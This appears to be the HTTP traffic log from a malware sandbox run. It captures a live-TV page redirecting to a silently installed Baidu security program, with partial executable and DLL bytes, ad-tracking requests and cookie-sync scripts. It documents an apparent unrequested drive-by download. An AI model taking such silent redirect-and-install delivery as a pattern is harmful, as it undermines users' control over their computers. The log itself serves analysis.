User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.4.3
Date: Fri, 13 Jun 2014 17:29:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.2
Location: hXXp://dl1sw.baidu.com/client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe



GET /stat.htm?id=2701879&r=&lg=en-us&ntime=none&repeatip=0&rtime=0&cnzz_eid=2120480958-1402680527-&showp=1276x846&st=0&sin=&t=&rnd=403236780 HTTP/1.1
Accept: */*
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=1320146&go=
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs17.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Fri, 13 Jun 2014 17:28:48 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..



GET /media/v1/0f000c60Ma_q1Fr10rMvif.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://ubmcmm.baidustatic.com/media/v1/0f0002EBaHfWMpy9Ew2v2s.swf?url_type=1&id_555316071=media/v1/0f000rmn6cn7D14hDeZLyf.gif&id_5553832
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ubmcmm.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:16 GMT
Content-Type: image/gif
Connection: close
Content-Length: 8087
Cache-Control: max-age=31536000
Expires: Fri, 13 Mar 2015 10:29:01 GMT
Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT
media: media
GIF89a..Z.............fbcc_`YVW.......................................
...............YYs.........>@r..~.%.#(~"&v(,x5;.5;.7:xBF.EI.FJ.HL.8
:kMQ.X\.MP.w{.............gi..........................................
......................................................................
.......................................................... .. .. .. ..
 .. .. .. .. ..!..!..!..!..!..!..!..!..!..!..!..'..".."}."{."y"*.."w)1
.07.2:.3:.5<.4;./5.5<.).y6=.7>.6=. 0{8?.9@.;B.DK.MT.Z`.ej.di.
qv.rw.w{.y}.{..}......................................................
...........]ZZ`]].......}}{yywuupnn...................................
......................................................................
......................................................................
.......................!.......,......Z........H......*\......#J.H.b.v
...C..... C..I....(S.\[email protected].*].....P.I.J..
..X.j......`...K.lYf.........p...K....:................... ^...Xm...S.
.....3k....^..C..M.....S.^....p....H.....s...........N...... _........
-M......i...........O......._..}{`..5k................3.v..h..H.....6.
...F.^/.tS.;.f....v... r( .$.h"v.....,....0.(..4.h..8....<.8...<
.N.D.i..H...(.....PF)..TVi..Xf.e..\B....S..d.i._=....l....p..c.C&i....
...|.....v..q7\....&....h...gF*..D.b...f....v.....*....j.......B......
......*e...R..jl..-..J.&9.p.,.AJ........F ...Vk...f....v..... ..s..N:.
........... ....k...../.... -..,.........bo,Ob.0..G..,[email protected]\.. 
.,..$.l....{..,....0....88,..1Sl1..f...-.,4..X..%.....L7-Z.PG-..TW
<<< skipped >>>


GET /client/ws1215/0611/BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Range: bytes=15990784-
Referer: hXXp://w.x.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 206 Partial Content
Expires: Sun, 13 Jul 2014 16:05:00 GMT
Date: Fri, 13 Jun 2014 16:05:00 GMT
Server: nginx
Content-Type: application/octet-stream
Last-Modified: Tue, 10 Jun 2014 19:14:19 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Content-Range: bytes 15990784-30927031/30927032
Content-Length: 14936248
Age: 5069
Via: 1.0 sdytwt86:80 (Cdn Cache Server V2.0), 1.0 tswt76:80 (Cdn Cache Server V2.0), 1.0 jg11:8888 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.647.511_Sid_55555_Silent_Defense.exe"
n..H..u.B.3._..v...wv...m.tG.0..S.P...?..o..3.......h2...=.Z......R`d.
4.FM&P..b.w.3.IO...o.ai.mju.4..q..9...rW.[....X....X*.[[email protected]&
..._.....k.J.....\..Dd...N..1...h.Bz)..6..^>2........T......6}x4.f}
.e....;[email protected].../L8.....#.6
/3Yx.[...`Hf...n.;.z.r>..#.0I..B......c..a.g.v.a..}.%.f...K...z.Jez
.f..(.....,..P.P.o2".?..I.Ue...b....$.)-.....B..27..j.x.Y..TGN/W...[..
C.H%9..'~....,.s9q#....g.h...C....$6 ..^..y*.x..P..c......A.e.....j.d.
..........V..:n..XUs.....3|.G.*..._.1...r U.[.a.].PP...).<N/.../..d
QA.3V.. ...YH..........J.L....fSD...*.....N.Q.o......w...A6.1.O.i/../B
t"%.........._^Z.O.t..3'..-.W *s...s......L<...G..B.P.3.t.....Xu.N.
..d=..^.r0X.Wj..Q..H..2u..H..P...S.......1...Z......{..lT....W...;..n.
[email protected] .H....B..h......#....,..P#.....2.H.J)9.G{..0.cM...qYM
c..........z........^.2.._...b...c....`.-.>.o"......_6.]6.i$!/<.
..$.y8.....)>./D...3C.1.....]v<...M....SNWQa...$....L.4..R...i9y
..5....9D.r.r..M9[.6...:..Q^..v6....&.6......P....{...M. .g...q6..x..)
.V.ln.L.!...%..f.....O ...W...B/.:.UO.c.SJ.S=[[...7.F.........z7.lz..H
)..\.G....!.$z....-T.E.......m.i....QW......96l][email protected].!.^...B..
M.W*...dd..`_C.}[email protected],..}O...%2..v.......$....#...YC......
-/.D...x...=].8.R,&...t..t..LX.:.2....u.j.@.~.3.NM,E_.r\.qX...:.E.,...
.-....$.[.t.......u.]..R....I..Kz...s.I...rW2.~.N...N.fL...........g..
.Y0......8O..nC..4...r0..<.K...%. ..........)5.D...e.=..Y)...WP.".)
.Y.}1_......r......v#........'?Y...G..:m..S;..p...>...-?K.|...j
<<< skipped >>>


GET /play/?f=fengyunzhibo.com&c=693619_1371525642501 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://mini.fengyunzhibo.com/mini/fymini.htm?f=aiqingzhihui&code=null
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: statistics.m0lxcdn.kukuplay.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 11 Nov 2013 18:27:44 GMT
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Content-Encoding: gzip
X-Via-Cache: jx
X-cdn: ydcdn
X-hit-at: jx
Content-Length: 343
Accept-Ranges: bytes
Date: Fri, 13 Jun 2014 17:29:15 GMT
X-Varnish: 2020922254 2009071293
Age: 137717
Via: 1.1 varnish
Connection: keep-alive
..........]Q.N.0.. .........M....P...a`B.m)..8$7.......lL|....8M(.....
.>.\{'..K.j....x.ny.S2Q.D".....M..(Y..e.}..I..F...C.j...Y^H.....J..
,..F...............g...";l..%.....Q..Z......Y..v,..@..&W.....i..t1#@).
..D..b..F*[email protected]...#.f....L....._E..A...C.H.X..Diq....-
:.z......;................c.9..<.s..w.%.ZS....y.Q..g\._..7..:_....H
TTP/1.1 200 OK..Content-Type: text/html..Last-Modified: Mon, 11 Nov 20
13 18:27:44 GMT..Expires: Thu, 31 Dec 2037 23:55:55 GMT..Cache-Control
: max-age=315360000..Content-Encoding: gzip..X-Via-Cache: jx..X-cdn: y
dcdn..X-hit-at: jx..Content-Length: 343..Accept-Ranges: bytes..Date: F
ri, 13 Jun 2014 17:29:15 GMT..X-Varnish: 2020922254 2009071293..Age: 1
37717..Via: 1.1 varnish..Connection: keep-alive............]Q.N.0.. ..
.......M....P...a`B.m)..8$7.......lL|....8M(......>.\{'..K.j....x.n
y.S2Q.D".....M..(Y..e.}..I..F...C.j...Y^H.....J..,..F...............g.
..";l..%.....Q..Z......Y..v,..@..&W.....i..t1#@)...D..b..F*.....g@....
m..5...y.u...#.f....L....._E..A...C.H.X..Diq....-:.z......;...........
.....c.9..<.s..w.%.ZS....y.Q..g\._..7..:_......



GET /sw-search-sp/client/dlljg1/BDMNet.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=819200-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:29:12 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 425408
Content-Range: bytes 819200-1244607/1244608
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Wed, 21 Aug 2013 08:14:12 GMT
Expires: Sat, 14 Jun 2014 07:46:32 GMT
x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC
ETag: 6812edbc825d28224d79d3645c9bb0f6
x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6MjQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=
x-bs-meta-crc32: 440605594
Content-MD5: 6812edbc825d28224d79d3645c9bb0f6
x-bs-client-ip: MTE1LjIzMS40Mi4xODE=
.....|$...............~S.....H.f..............x...9.h.........x..H....
.......h...*.f...........f.............f..............................
........... .;..|$.~Z............H.f..............x...9.h.........H..x
...........h...*.f...L$..L..f.......t$(..f......f..f.......|$.........
......~S.....H.f..............x...9.h.........x..H...........h...*.f..
.........f.............f..................... .;..|$.~Z............H.f
..............x...9.h.........H..x...........h...*.f...L$..L..f.......
t$(..f......f..f.......|$...............~P..HTTP/1.1 206 Partial Conte
nt..Server: JSP2/1.0.27..Date: Fri, 13 Jun 2014 17:29:12 GMT..Content-
Type: application/x-msdownload..Connection: close..Content-Length: 425
408..Content-Range: bytes 819200-1244607/1244608..Access-Control-Allow
-Origin: *..Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POS
T, DELETE..Access-Control-Expose-Headers: Content-Length, ETag, x-bs-r
equest-id, x-pcs-request-id..Access-Control-Allow-Headers: Range, Orig
in, Content-Type, Accept, Content-Length..Accept-Ranges: bytes..Last-M
odified: Wed, 21 Aug 2013 08:14:12 GMT..Expires: Sat, 14 Jun 2014 07:4
6:32 GMT..x-bs-version: 3DB44104797F6F34C7AB9E0A496537CC..ETag: 6812ed
bc825d28224d79d3645c9bb0f6..x-bs-request-id: MTAuMjE1Ljg4LjM2OjgwODA6M
jQzNDMzNTU2MDoxMS9KdW4vMjAxNCAxNTo0NjozMiA=..x-bs-meta-crc32: 44060559
4..Content-MD5: 6812edbc825d28224d79d3645c9bb0f6..x-bs-client-ip: MTE1
LjIzMS40Mi4xODE=.......|$...............~S.....H.f..............x...9.
h.........x..H...........h...*.f...........f.............f........
<<< skipped >>>


GET /ecom?di=u1537506&dcb=BAIDU_DUP2_define&dtm=BAIDU_DUP2_SETJSONADSLOT&dbv=0&dci=0&dri=0&dis=0&dai=3&dds=&drs=3&dvi=1401358918<u=http://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960&liu=<r=&lcr=&ps=357x3&psr=1276x846&par=1276x818&pcs=758x450&pss=758x493&pis=-1x-1&cfv=11&ccd=32&chi=0&cja=true&cpl=0&cmi=0&cce=true&col=en-us&cec=utf-8&cdo=-1&tsr=7875&tlm=1398686606&tcn=1402680545&tpr=1402680537275&dpt=none&coa=&baidu_id= HTTP/1.1
Accept: */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1168
Connection: Keep-Alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat Jun 14 01:29:00 2014
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
BAIDU_DUP2_define('request!u1537506_0',[],{deps:['nova/painter/inlayFi
xed1392089005'],data:{"id" : "u1537506","_isMlt" : 4,"sw" : 728,"sh" :
 90,"_html" : {"cec":"utf-8", "dai":"3", "cfv":"11", "cpa":"1", "col":
"en-us", "dis":"0", "xuanting":"0", "n":"67025059_1_cpr", "conOP":"0",
 "scale":"", "skin":"", "rsi0":"728", "rsi1":"90", "rsi5":"4", "ltr":"
", "ltu":"hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?
spid=-37237366455960", "pcs":"758x450", "rss0":"#FFFFFF", "rss1":"#FFF
FFF", "rss2":"#0000FF", "rss3":"#444444", "rss4":"#008000", "rss5":"",
 "rss6":"#e10900", "rss7":"", "rad":"", "pis":"10000x10000", "aurl":""
, "psr":"1276x846", "pss":"758x493", "tpr":"1402680537275", "lunum":"6
", "ch":"0", "at":"6", "qn":"18a90fef6d4567e7", "ps":"357x3", "tn":"te
xt_default_728_90", "ts":"1", "td_id":"1537506", "adn":"3", "cad":"1",
 "ccd":"32"},"_html_old" : "cpro_client=67025059_1_cpr|cpro_template=t
ext_default_728_90|cpro_h=90|cpro_w=728|cpro_at=image|cpro_cbd=#FFFFFF
|cpro_cbg=#FFFFFF|cpro_ctitle=#0000FF|cpro_cdesc=#444444|cpro_curl=#00
8000|cpro_cflush=#e10900|cpro_161=3|cpro_flush=4|cpro_cad=1","qn" : "1
8a90fef6d4567e7","_qid" : "18a90fef6d4567e7"}});....


GET /sync_pos.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://cpro.baidustatic.com/sync.htm?cproid=49F93F86C60D03A8D23F3919153C48A7:FG=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:04 GMT
Content-Type: text/html
Content-Length: 1216
Last-Modified: Wed, 12 Mar 2014 07:45:00 GMT
Connection: Keep-Alive
ETag: "5320107c-4c0"
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Accept-Ranges: bytes
<!DOCTYPE html>.<html>.    .    <head></head>.
    .    <body>.        <script type="text/javascript">   
         .            var getCookie=function(b,d){var a;d=d||window;va
r c=RegExp("(^| )" b "=([^;]*)(;|$)").exec(d.document.cookie);c&&(a=c[
2]);return a},setCookie=function(b,d,a){a=a||{};var c=a.expires;"numbe
r"==typeof a.expires&&(c=new Date,c.setTime(c.getTime() a.expires));do
cument.cookie=b "=" d (a.path?"; path=" a.path:"") (c?"; expires=" c.t
oGMTString():"") (a.domain?"; domain=" a.domain:"") (a.secure?"; secur
e":"")},getUrlParam=function(b){b=RegExp("(^|&)" b "=([^&]*)(&|$)","i"
);b=window.location.search.substr(1).match(b);.            return null
!=b?decodeURIComponent(b[2]):null},currentDomain=document.domain.toLow
erCase(),referDomain=(document.referrer?document.referrer.match(/.*\:\
/\/([^\/]*).*/i)[1]:"").toLowerCase(),urlCproId=getUrlParam("CPROID"),
cookieCproId=getCookie("CPROID"),targetCproId;!urlCproId||"pos.baidu.c
om"!==currentDomain||"cpro.baidu.com"!==referDomain&&"cpro.baidustatic
.com"!==referDomain||cookieCproId&&cookieCproId===urlCproId||setCookie
("CPROID",urlCproId,{path:"/",domain:".pos.baidu.com",expires:(new Dat
e).setFullYear(2042)});.        </script>.    </body>..<
;/html>....
<<< skipped >>>

GET /wh/o.htm?ltr=&cf=u HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://VVV.mnh.quzhao.com/x/mnh/mini/q428/mini_mnh_428.html?spid=-37237366455960
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pos.baidu.com
Connection: Keep-Alive
Cookie: BAIDUID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISBID=49F93F86C60D03A8D23F3919153C48A7:FG=1; ISUS=1; CPROID=49F93F86C60D03A8D23F3919153C48A7:FG=1; BAIDUID=D1F510B78251BF62B517A49EAEC89AE3:FG=1


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 13 Jun 2014 17:29:09 GMT
Content-Type: text/html
Content-Length: 426
Last-Modified: Fri, 11 Apr 2014 09:06:00 GMT
Connection: Keep-Alive
ETag: "5347b078-1aa"
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Accept-Ranges: bytes
<!DOCTYPE html>.<html>.    <head></head>.    &
lt;body>.        <style>.            .userData {behavior:url(
#default#userdata);}.            .client {behavior:url(#default#client
Caps);}.        </style>.        <div id="oPersistDiv" class=
"userData"></div>.        <div id="clientDiv" class="clien
t"></div>.        <div id="oFlashDiv"></div>.    
    <script src="hXXp://dup.baidustatic.com/tpl/wh.js"></scri
pt>.    </body>.</html>..



GET /sw-search-shadu/client/dllv4/BDMReport.dll HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dlsw.baidu.com
Range: bytes=983040-
Referer: hXXp://dlsw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.1 206 Partial Content
Server: JSP2/1.0.27
Date: Fri, 13 Jun 2014 17:28:46 GMT
Content-Type: application/x-msdownload
Connection: close
Content-Length: 224480
Content-Range: bytes 983040-1207519/1207520
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length
Accept-Ranges: bytes
Last-Modified: Tue, 20 Aug 2013 07:03:07 GMT
Expires: Sat, 14 Jun 2014 07:20:40 GMT
x-bs-version: A65F70E089635AE47A1E2AED4F13B889
ETag: 30cbc602ada7cdfb0346038c05996d84
x-bs-request-id: MTAuMjE0LjQyLjIyOjgwODA6MTQ3NzYzMjU5MToxMS9KdW4vMjAxNCAxNToyMDo0MCA=
x-bs-meta-crc32: 2965621797
Content-MD5: 30cbc602ada7cdfb0346038c05996d84
x-bs-client-ip: MTE1LjIzMS40Mi4xMjA=
.J.3..C..........................M..H....T$..B..J.3............|......
...........M.......T$..B..J.3.......H....L.................M...!...M..
.....T$..B..J.3.......|..............M..(#...M.......T$..B..J.3..|....
...............M.......M......4...T$..B..J.3..I................M..X...
.M.....m4...T$..B..J.3...................M..8....M......4...T$..B..J.3
.......L....Q......M.......M.....m4...M...... ...T$..B..J.3...........
.............M.......M......8...T$..B..J.3..y................M.......M
.....m8...T$..B..J.3..I................M..h....M.....M9...T$..B..J.3..
.....$...........M..8....M......9...M......*...T$..B..J.3.......`....F
...........M...y...T$..B..J.3..............................E..........
.e...M........T$..B..J.3..s..........................T$..B..J.3..L....
\..............E...........e...M..H.....T$..B..J.3............{.......
[email protected]$..B..J.3............;.............
...M..(M...E...........e...M........T$..B..J.3.....................M..
.L...T$..B..J.3..d...........................M...L...T$..B..J.3..4....
H......................M...L...T$..B..J.3.......|....l................
.M..XL...T$..B..J.3............<..................|..............|.
....M.........|..............|.....M.........|..............|.....M...
......|..............|.....M...>....T$...t.....p...3..*.......J.3..
.....................M...>...M...>...M..x>...T$..B..J.3......
.0....L.................M.......T$..B..J.3.......l....................
..M.......T$..B..J.3..............................M.......T$..B..J
<<< skipped >>>


GET /play/meinvyingimg/btnIcon/1.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: image.anbangjiance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Wed, 26 Mar 2014 05:52:25 GMT
Accept-Ranges: bytes
ETag: "c2ca4990b748cf1:0"
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:16 GMT
Content-Length: 3101
.PNG........IHDR.......$.......l.....pHYs................ cHRM..z%....
..........u0...`..:....o._.F....IDATx...kl.....3..W_..8.v...$.J....H.m
.((B.. @..Z.jUA/*.B.J.......*m..T!..!J.Pb.I..I.TvH....e.........a<.
...]{..{..5s...=g.}....5SU.DQ.......<...!..3......E........... L.x.
./..H..=...n(.>....V......<E]R......x."...D.H..G......h......2..
.......2...O.B.Y.$..4..1d .A....A..A.B..A....A..#.<....g.......v...
-...;v....7.F%....\....w....z.0.?....u...0..Jq.=...........!t..bz\DE..
7l......cl....#[email protected]........&.J...*.........L'.k7.
.R...x.......Db...].Ed|v.".^..W.P..3.G'qh.0b....."2zN....X.D....K...`g
......0............N}Se..P..1....:C....:C..q...&c.9..s.};.6...= ......
|"%e.|;[email protected][email protected]....'...X..a...1..J.a.\R
XW.H.......N.#.2..2.[.GY^....<........X.TW.O.z...Q b....t...2.v.v..
u902.BRdp....78....`.!!J...ae...8........L"...'......M .W...q.....6.i&
lt;[email protected]....~f..X.&...>.QUuYM.....T. .\...l...~#.0c.FmY.L2..Y.
[..%.p...w...p..c..U.'9...`r<L..^h.D.....ee&.IT...R..f......c....@.
.........3..D/..e.F....N]8.L..E!RZ..=..*.bh".jQ8X%.4\.......F.Bn&U.78}
.d5:Z*..>4_Y............<....E..o.2...g.Vg.KEY...f/....*[..A._..
.#.9..jR..C..5..c...#.F.8.......=.iRfLo0F....X`..J.c.7:#..y....Y.B3...
...7=>^.npE...r1.|........`.x-..'2.@<&..?w!<%.1...........N..
....tI....TH:.....Z..2.........!4..N.p..W.... s.x,S.r3.].6..{......?%.
...m.:.i...hg.......x..^....W|t`...~.....Y...#..O....j..........|.....
............f<v..."..r/.'0..vu.W..>.~a.N....h..:.6n...<..
<<< skipped >>>

GET /play/meinvyingimg/btnIcon/3.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: image.anbangjiance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Wed, 26 Mar 2014 05:52:25 GMT
Accept-Ranges: bytes
ETag: "7a3a3590b748cf1:0"
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:17 GMT
Content-Length: 2518
.PNG........IHDR.......$.......l.....pHYs................ cHRM..z%....
..........u0...`..:....o._.F...\IDATx...kl.....wf...M1~..$H.Ly..C.&...
....(....4-_*U..h...A..$...R..!..%.".!.jhy........5....L...k.N?..=;...
..,...2{w.......=..{...@.*t`.0.. ..@..\...x.;..8.m`..*[email protected]" Q.R.@
.!*8.....=..x.xU.$*xS.$.xC"...D..aE......G.m..A.!..].X ..5.xD.." .0.C"
] ..B#.".. .... ." . .... .. .".. ." . ..Pp.`[i.z`9....3`......K.R....
....)o.....j*l.v/.^.g"@b...=%.J......qw.~.R..0.M.x.........t.:M...|w.x
..;.g.0.....`.d.pd......nr.....7..3.......T......H.D...30>.n...... 
[email protected][email protected].=F<..-.7...Z}...R...iU.%......>....
P..#....../..C....Mil}.%.....^...x....0.`.c..d0e...6.k8.....twy.?.....
..4JWe...........`. .B.....D$.}.v}.....<.2.........k....R.|........
Q .Q...kl.Z.R....Q.Ye. ../.^.........9...v..._<..}=......j....<9
b..m..n.I..bs...u...6..x.*.ikv'..n-..~ ..Z.duk..'S.J...#SW..:.....it=.
]s.).....}.{8.1.x5/.o...=...2I.......q.......x>B.[.modrN".I....p../
..E.x.;Q../"k..t.g.D^.~ewZ./"Va.w.i.9..y...7m..4<..&T.{v....Q{.5.B.
.b....D.~.\...>r....y.*.:.5..... .....\......le...LB.gO\g...xz}'...
........m{..<..x....bs.X.n..... .).d.\..{.....j..1.".3..X.<#f.1.
...R.%..y.w..X.[.{....E..Ma.".A..a.@...;.\~b.w...g...K..j{{...S....s.^
.p.n..Qp:.e..;.<.\:......CQZ....S.>..x.=n..w|..44M.....V.o#...N.
....v.f.^..*/Z.I~Q..[.E...x9.....j].m.....n...............m[9.w..E !..
.8(........I3'....]..Y.4.l......~......."T9.5...J...h...N6W....?.K....
..[...>l.....`...D`...p.p.'T2w4F 7.....3..._........Wo...c...(.
<<< skipped >>>

GET /play/meinvyingimg/btnIcon/6.png HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: image.anbangjiance.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Wed, 09 Apr 2014 03:32:57 GMT
Accept-Ranges: bytes
ETag: "93e84866a453cf1:0"
Server: Microsoft-IIS/7.5
Date: Fri, 13 Jun 2014 17:28:17 GMT
Content-Length: 3974
.PNG........IHDR.......$.......l.....tEXtSoftware.Adobe ImageReadyq.e&
lt;... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS5 Windows" xmpMM:InstanceID="xmp.iid:C4E7F687BF9511E39E28A1E490
1D8F14" xmpMM:DocumentID="xmp.did:C4E7F688BF9511E39E28A1E4901D8F14">
; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C4E7F685BF9511E39E28
A1E4901D8F14" stRef:documentID="xmp.did:C4E7F686BF9511E39E28A1E4901D8F
14"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> 
<?xpacket end="r"?>.B......IDATx..]{L[..?./lc.`...B........y.X..
.....M{i..J.6M..M{..n.6m.c..i..I..v..G....>[email protected]~....r.
\?3..r~.O.{./...=....|..p8.........4.p..x.=.}. .GV..|..%d...].......x,
...!..a..0I6.E... {...W.o...U.K6...d....d..!.e..=...e...........2.....
..aq..U(a.a0.<$<.l..2X@.......`0.......`..0...C...2^=.......B.F.
F.C...1O...4.7|EW.x.;.}v.I;]V..\.Xp...........!...{|...z.1..S..J.yPYk.
